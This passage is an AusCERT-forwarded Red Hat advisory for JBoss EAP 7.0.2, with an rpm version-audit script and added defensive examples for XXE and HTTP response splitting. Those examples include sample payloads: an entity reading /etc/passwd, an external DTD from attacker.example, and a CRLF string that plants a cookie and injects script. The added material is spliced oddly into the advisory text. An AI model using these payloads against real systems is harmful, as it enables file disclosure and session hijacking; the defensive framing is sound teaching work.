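    "eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch.rpm",
    "eap7-wildfly-modules-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch.rpm",
    "eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el6.noarch.rpm",
    "eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el6.noarch.rpm",
]

# Constructed sample of `rpm -qa 'eap7-*'` output from a partly updated host.
SAMPLE_RPM_QA = """\
eap7-jboss-jstl-api_1.2_spec-1.1.2-1.Final_redhat_1.1.ep7.el6.noarch
eap7-undertow-1.3.23-1.Final_redhat_1.1.ep7.el6.noarch
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch
eap7-wildfly-modules-7.0.2-1.GA_redhat_1.1.ep7.el6.noarch
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el6.noarch
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el6.noarch
eap7-example-unrelated-1.0.0-1.ep7.el6.noarch
"""


def parse_nvra(pkg: str):
    """Split 'name-version-release.arch[.rpm]' into (name, version, release)."""
    if pkg.endswith(".rpm"):
        pkg = pkg[:-4]
    base, _, _arch = pkg.rpartition(".")          # drop '.noarch' / '.src'
    name, version, release = base.rsplit("-", 2)  # name may itself contain '-'
    return name, version, release


def rpmvercmp(a: str, b: str) -> int:
    """Port of librpm's rpmvercmp(): -1, 0 or 1 for a < b, a == b, a > b."""
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        # separators (anything but alphanumerics, '~' and '^') are skipped
        while i < len(a) and not (a[i].isalnum() or a[i] in "~^"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] in "~^"):
            j += 1
        ta, tb = a[i:i + 1] == "~", b[j:j + 1] == "~"
        if ta or tb:                      # '~' sorts before anything, even end of string
            if not ta: return 1
            if not tb: return -1
            i, j = i + 1, j + 1
            continue
        ca, cb = a[i:i + 1] == "^", b[j:j + 1] == "^"
        if ca or cb:                      # '^' sorts after end of string, before anything else
            if i >= len(a): return -1
            if j >= len(b): return 1
            if not ca: return 1
            if not cb: return -1
            i, j = i + 1, j + 1
            continue
        if i >= len(a) or j >= len(b):
            break
        # take a run of digits or a run of letters; a's next character picks the kind
        isnum = a[i].isdigit()
        kind = str.isdigit if isnum else str.isalpha
        si, sj = i, j
        while i < len(a) and kind(a[i]): i += 1
        while j < len(b) and kind(b[j]): j += 1
        sa, sb = a[si:i], b[sj:j]
        if not sb:                        # b's run is the other kind: numbers beat letters
            return 1 if isnum else -1
        if isnum:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def compare_vr(a, b) -> int:
    """Compare (version, release) pairs the way rpm does; epoch assumed equal."""
    rc = rpmvercmp(a[0], b[0])
    return rc if rc else rpmvercmp(a[1], b[1])


def audit(rpm_qa_output: str, advisory_packages) -> dict:
    """Map each installed package name to 'fixed', 'VULNERABLE' or 'not-in-advisory'."""
    fixed = {}
    for filename in advisory_packages:
        name, version, release = parse_nvra(filename)
        fixed[name] = (version, release)
    result = {}
    for line in rpm_qa_output.splitlines():
        if not line.strip():
            continue
        name, version, release = parse_nvra(line.strip())
        if name not in fixed:
            result[name] = "not-in-advisory"
        elif compare_vr((version, release), fixed[name]) >= 0:
            result[name] = "fixed"
        else:
            result[name] = "VULNERABLE"
    return result


if __name__ == "__main__":
    data = SAMPLE_RPM_QA if sys.stdin.isatty() else sys.stdin.read()
    for name, status in sorted(audit(data, ADVISORY_PACKAGES).items()):
        print(f"{status:16} {name}")
```

Pipe real output into it with `rpm -qa 'eap7-*' | python3 audit.py`. Three
caveats: `rpm -qa` does not print the epoch, so the script assumes epochs are
equal (query with `rpm -q --queryformat '%{EPOCH}:%{VERSION}-%{RELEASE}\n'` if
you need it); the zip distribution from RHSA-2016:1841 is invisible to rpm
altogether; and the script says nothing about authenticity, which is what
`rpm --checksig` against the Red Hat key linked above is for.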

8. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bEDXlSAg2UNWIIRAhzHAJ0aRfYhnQ17z3CPfYgwOn9uGyEEoQCbBefA
c5ScVpEfHhWkIZ3El0uuI94=
=mT22
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: JBoss Enterprise Application Platform 7.0.2
Advisory ID:       RHSA-2016:1841-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1841.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform
7.0.2, fix several bugs, and add various enhancements are now available
from the Customer Portal.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Description:

Red Hat JBoss Enterprise Application Platform 7 is an application server
that serves as a middleware platform and is built on open standards and
compliant with the Java EE 7 specification.

This release serves as a replacement for Red Hat JBoss Enterprise
Application Platform 7.0.1. It includes bug fixes and enhancements. Refer
to the JBoss Enterprise Application Platform 7.0.2 Release Notes linked to
in the References section for information about the most significant bug
fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to use external entity references,
which could access resources on the host system and, potentially, allow
arbitrary code execution. (CVE-2015-0254)

* It was reported that the EAP 7 application server and its Undertow web
server are vulnerable to the injection of arbitrary HTTP headers and to
HTTP response splitting, because user input is not sufficiently sanitized
and validated before it is used as part of an HTTP header value.
(CVE-2016-4993)

* The domain controller does not propagate its administrative RBAC
(role-based access control) configuration to some slave host controllers,
so the access restrictions configured on the domain controller are not
enforced there. An authenticated management user could use this to
escalate their privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).
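An added example, not part of the Red Hat advisories or of the JSTL code: the
CVE-2015-0254 description repeated in all four advisories above is an XXE
(XML external entity) bug, so the check a practitioner wants in front of any
parser that resolves DTDs is a pre-screen that reports DOCTYPE and
external-entity declarations without fetching anything. The screen below is
written in Python on the standard-library expat binding as a language-neutral
illustration; the three sample documents and the `attacker.example` host are
constructed for it. In Java the equivalent parser-level hardening is the
Xerces feature `http://apache.org/xml/features/disallow-doctype-decl` set to
true on the parser factory, but an application cannot configure the parser
that the JSTL XML tags create for themselves, which is why the updated
eap7-jboss-jstl-api package is the fix here.

```python
import xml.parsers.expat as expat


class XxeScreen:
    """Record the DTD features of an XML document that make it unsafe to hand
    to an entity-resolving parser, without fetching anything ourselves."""

    def __init__(self):
        self.doctype = None           # (name, system_id, public_id) if a DOCTYPE is present
        self.external_entities = []   # (entity_name, system_id, public_id) declarations
        self.expanded = []            # system ids of external entities referenced in content
        self.parse_error = None

    def _on_doctype(self, name, system_id, public_id, has_internal_subset):
        self.doctype = (name, system_id, public_id)

    def _on_entity_decl(self, name, is_param, value, base, system_id, public_id, notation):
        # value is None for external entities; the SYSTEM/PUBLIC ids say where they point
        if system_id is not None or public_id is not None:
            self.external_entities.append((name, system_id, public_id))

    def _on_external_ref(self, context, base, system_id, public_id):
        # Called when content references an external entity. Returning 1 tells
        # expat to continue with an empty replacement instead of loading it.
        self.expanded.append(system_id)
        return 1

    def scan(self, data: bytes) -> "XxeScreen":
        parser = expat.ParserCreate()
        parser.StartDoctypeDeclHandler = self._on_doctype
        parser.EntityDeclHandler = self._on_entity_decl
        parser.ExternalEntityRefHandler = self._on_external_ref
        try:
            parser.Parse(data, True)
        except expat.ExpatError as err:
            self.parse_error = str(err)
        return self

    def is_safe(self, allow_internal_dtd: bool = False) -> bool:
        """Strict policy (default) rejects any DOCTYPE, like disallow-doctype-decl;
        the lenient policy only rejects external subsets and external entities."""
        if self.parse_error or self.external_entities or self.expanded:
            return False
        if self.doctype is None:
            return True
        _, system_id, public_id = self.doctype
        if system_id is not None or public_id is not None:
            return False                  # external DTD subset
        return allow_internal_dtd


# Constructed documents for the example.
XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""

EXTERNAL_DTD_DOC = (b'<?xml version="1.0"?>\n'
                    b'<!DOCTYPE data SYSTEM "http://attacker.example/evil.dtd">\n'
                    b'<data/>')

INTERNAL_ONLY_DOC = b'<!DOCTYPE data [<!ENTITY vendor "Red Hat">]><data>&vendor;</data>'

CLEAN_DOC = b"<data><item>ok</item></data>"


if __name__ == "__main__":
    samples = (("xxe", XXE_DOC), ("external dtd", EXTERNAL_DTD_DOC),
               ("internal dtd", INTERNAL_ONLY_DOC), ("clean", CLEAN_DOC))
    for label, doc in samples:
        s = XxeScreen().scan(doc)
        print(f"{label:13} safe={s.is_safe()} doctype={s.doctype} "
              f"external={s.external_entities}")
```

The strict default is the policy to deploy: an application that accepts XML
from users almost never needs a DTD, and refusing the DOCTYPE outright also
closes entity-expansion denial of service, which the lenient policy does not.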
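A second added example, again not code from Red Hat or Undertow: the
CVE-2016-4993 description above says user input reaches an HTTP header value
without sufficient validation, and the consequence it names, header injection
and response splitting, is easiest to see on the wire. The Python below shows
a redirect handler that copies a user-supplied target into `Location`
unchecked, the split response that produces, and the hardened form that
validates the value against the RFC 7230 field-value grammar before writing
it. The handler, the attack parameter and the cookie name are constructed for
the example; it illustrates the bug class, not Undertow's internals.

```python
import re
from urllib.parse import unquote

STATUS_LINE = re.compile(rb"(?m)^HTTP/1\.[01] \d{3} ")


def build_redirect_unsafe(target: str) -> bytes:
    """The bug pattern: a user-controlled value is written straight into a
    header, so any CR/LF it carries becomes protocol structure."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {target}\r\n"
            "Content-Length: 0\r\n"
            "\r\n").encode("latin-1")


def is_valid_field_value(value: str) -> bool:
    """RFC 7230 field-value: visible ASCII, SP, HTAB and obs-text (0x80-0xFF).
    CR, LF, NUL, every other control character and non-Latin-1 are rejected."""
    for ch in value:
        code = ord(ch)
        if ch == "\t" or 0x20 <= code <= 0x7E or 0x80 <= code <= 0xFF:
            continue
        return False
    return True


def build_redirect_safe(target: str) -> bytes:
    """Hardened form: validate the value exactly as it will be written."""
    if not is_valid_field_value(target):
        raise ValueError("header value contains CR/LF or other control characters")
    return build_redirect_unsafe(target)


def count_responses(raw: bytes) -> int:
    """How many HTTP responses a client would see in one byte stream."""
    return len(STATUS_LINE.findall(raw))


def first_response_headers(raw: bytes) -> dict:
    """Headers of the first response in the stream, lower-cased names."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.decode("latin-1").lower()] = value.decode("latin-1").strip()
    return headers


# Constructed attacker input: a 'next' query parameter as it arrives on the
# wire. %0d%0a decodes to CRLF; the payload plants a cookie on the 302 and
# appends a complete second response carrying script to the same connection.
ATTACK_PARAM = ("/home%0d%0aSet-Cookie:%20session=attacker%0d%0aContent-Length:%200"
                "%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html"
                "%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E")


def demo(param: str = ATTACK_PARAM) -> dict:
    """Run one parameter through both handlers and report what happened."""
    target = unquote(param)   # the value a handler sees after query-string decoding
    unsafe = build_redirect_unsafe(target)
    try:
        build_redirect_safe(target)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "responses_in_stream": count_responses(unsafe),
        "injected_cookie": first_response_headers(unsafe).get("set-cookie"),
        "rejected_by_check": rejected,
    }


if __name__ == "__main__":
    print(demo())
    print(demo("/account?next=%2Fhome"))
```

Two practical points follow from the check. It has to run on the decoded
value, after the framework has undone percent-encoding, because that is the
string that is actually written; and for a `Location` header the alternative
to rejecting is re-encoding the target, never stripping just CR and LF, since
other control characters are equally outside the grammar.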

3. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

The References section of this erratum contains a download link (you must
log in to download the update).

The JBoss server process must be restarted for the update to take effect.

4. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

5. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/installation-guide/
https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=appplatform&downloadType=securityPatches&version=7.0

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bEKXlSAg2UNWIIRAkewAJ9OkY6rQWqj4XN9fJ7sXk2ekYTkNgCgoDBt
1LrdRKmug4uwyJVeFmOqWgQ=
=EQC4
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----